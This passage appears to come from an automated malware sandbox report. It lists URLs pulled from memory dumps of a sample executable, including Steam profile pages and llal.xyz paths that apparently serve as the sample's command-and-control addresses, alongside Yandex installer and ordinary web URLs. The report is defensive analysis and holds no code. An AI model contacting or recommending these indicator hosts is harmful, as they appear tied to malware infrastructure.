                    https://www.google.com0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://browser.yandex.0x001900000002ab40-59.exefalseunknown
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=16964972674007000x001900000002ab40-59.exe, 00000001.00000003.1712081694.0000000008357000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712269375.000000000835A000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://steamcommunity.com/hg0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A4D000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=ttNb0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalseunknown
                        https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&amp;l=english0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalseunknown
                        https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalseunknown
                        https://llal.xyz/U60x001900000002ab40-59.exe, 00000001.00000003.1646905616.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&amp;l=english0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://download.cdn.yandex.net/browser/installer/0x001900000002ab40-59.exefalseunknown
                          https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://steamcommunity.com/profiles/76561199619938930dll0x001900000002ab40-59.exe, 00000001.00000002.1724281527.00000000059FC000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://s.ytimg.com;0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta0x001900000002ab40-59.exe, 00000001.00000003.1712081694.0000000008357000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712269375.000000000835A000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://steam.tv/0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://llal.xyz/Up/b60x001900000002ab40-59.exe, 00000001.00000003.1691573716.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712291354.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1723012989.00000000082A0000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722517315.00000000082A3000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722622099.00000000082A7000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1725668402.00000000082A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://llal.xyz/Up/b/0x001900000002ab40-59.exe, 00000001.00000003.1691573716.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712291354.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1723012989.00000000082A0000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722517315.00000000082A3000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722622099.00000000082A7000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1725668402.00000000082A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://store.steampowered.com/privacy_agreement/0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://store.steampowered.com/points/shop/0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0x001900000002ab40-59.exe, 00000001.00000003.1670010491.0000000008324000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                    http://crl.rootca1.amazontrust.com/rootca1.crl00x001900000002ab40-59.exe, 00000001.00000003.1711911198.0000000008329000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://llal.xyz/u0x001900000002ab40-59.exe, 00000001.00000003.1646905616.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://ocsp.rootca1.amazontrust.com0:0x001900000002ab40-59.exe, 00000001.00000003.1711911198.0000000008329000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://llal.xyz/s0x001900000002ab40-59.exe, 00000001.00000003.1646905616.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://sketchfab.com0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.ecosia.org/newtab/0x001900000002ab40-59.exe, 00000001.00000003.1670010491.0000000008324000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://lv.queniujq.cn0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://steamcommunity.com/profiles/76561199619938930e0x001900000002ab40-59.exe, 00000001.00000002.1724281527.00000000059FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://www.youtube.com/0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199619938930[1].htm.1.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://store.steampowered.com/privacy_agreement/0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://llal.xyz/0x001900000002ab40-59.exe, 00000001.00000003.1722573183.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1670243798.0000000008290000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1658364365.0000000008290000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                            https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962010x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                		unknown
                                                https://www.google.com/recaptcha/0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://checkout.steampowered.com/0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMB0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                      		unknown
                                                      https://crash-reports.browser.yandex.net/submit~S0x001900000002ab40-59.exe, 00000001.00000000.1519545162.0000000000933000.00000002.00000001.01000000.00000003.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpfalse
                                                        		unknown
                                                        https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://storage.ape.yandex.net/get/browser/install?ui=&result=cancelled&time=&download_time=&install0x001900000002ab40-59.exefalse
                                                          		unknown
                                                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                            		unknown
                                                            https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://llal.xyz0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1646905616.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://store.steampowered.com/;0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://download.cdn.yandex.net/browser/win7/0x001900000002ab40-59.exefalse
                                                                		unknown
                                                                https://store.steampowered.com/about/76561199619938930[1].htm.1.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://steamcommunity.com/my/wishlist/0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                                  		unknown
                                                                  https://llal.xyz/D0x001900000002ab40-59.exe, 00000001.00000002.1725640597.000000000829E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722573183.0000000008297000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=49iUccgO0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                                      		unknown
                                                                      https://community.akamai.steamstatic.com/public/c0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://help.steampowered.com/en/0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://steamcommunity.com/market/0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                                            		unknown
                                                                            https://store.steampowered.com/news/0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://community.akamai.steamstatic.com/0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr0x001900000002ab40-59.exe, 00000001.00000003.1712081694.0000000008357000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712269375.000000000835A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://llal.xyz/Up/bk0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722517315.00000000082A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOITg3&a0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                                                  		unknown
                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0x001900000002ab40-59.exe, 00000001.00000003.1670010491.0000000008324000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://store.steampowered.com/subscriber_agreement/0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                                                    		unknown
                                                                                    https://llal.xyz/Upx0x001900000002ab40-59.exe, 00000001.00000002.1724281527.00000000059FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://recaptcha.net/recaptcha/;0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://llal.xyz//0x001900000002ab40-59.exe, 00000001.00000002.1725640597.000000000829E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712291354.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722573183.0000000008297000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://api.browser.yandex.net/configs/all_zipbrandID=&partnerID=?Failed0x001900000002ab40-59.exefalse
                                                                                          		unknown
                                                                                          https://download.cdn.yandex.net/browser/installer/ybLocal0x001900000002ab40-59.exefalse
                                                                                            		unknown
                                                                                            https://llal.xyz/Up/bZ0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://steamcommunity.com/discussions/0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                                                                		unknown
